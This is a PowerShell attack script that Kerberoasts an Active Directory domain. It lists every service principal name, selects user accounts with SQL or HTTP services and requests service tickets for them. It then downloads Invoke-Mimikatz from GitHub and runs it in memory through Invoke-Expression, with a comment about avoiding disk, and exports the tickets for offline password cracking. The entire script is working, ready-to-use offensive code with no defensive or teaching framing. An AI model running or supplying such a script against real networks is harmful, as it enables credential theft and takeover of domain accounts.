grab-spns.ps1

function parse()
{
    param(
        [Object[]]$SetSPNOutput
    )
    
    function New-Item()
    {
        return $Item = New-Object PSObject -Property @{
            Name = ''
            SPN = @()
        }
    }
    
    $Output = @()
    $Item = New-Item

    $first = $true
    $SetSPNOutput |% {
       if ($_ -imatch "CN=") {
         if($first -eq $false){
            $Output += $Item
            $Item = New-Item
         }
         else {
            $first=$False
         }
         $Item.Name = $_
       }
       
       if($_ -imatch "\t") {
        $Item.SPN += [String]$_.trim()
       }
    }
    $Output += $Item
    $Output
}

#Load assembly(s)
Add-Type -AssemblyName System.IdentityModel

#Ouput location mimikatz
$outpath = (Join-Path $env:temp "out")
mkdir $outpath -ErrorAction SilentlyContinue | Out-Null
Set-Location $outpath

#Load mimikatz without touching disk
Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')

#Grab all SPN's
$spns = (setspn -F -Q */*)

#Kill currenct tickets
klist purge

#Parse interesting SPN's and grab a ticket.
parse $spns |? {$_.SPN |? {$_ -imatch 'SQL|HTTP'}} |? {$_.Name -imatch 'User'} |% {    
    #Try to grab 1 ticket for each interesting CN
    $_.Name
    foreach ($spn in $_.SPN) {
        try {
            New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
            break
        }
        catch {
        }
    }
}

#Export tickets using mimikatz
Invoke-Mimikatz -Command "`"kerberos::list /export`""

gci $outpath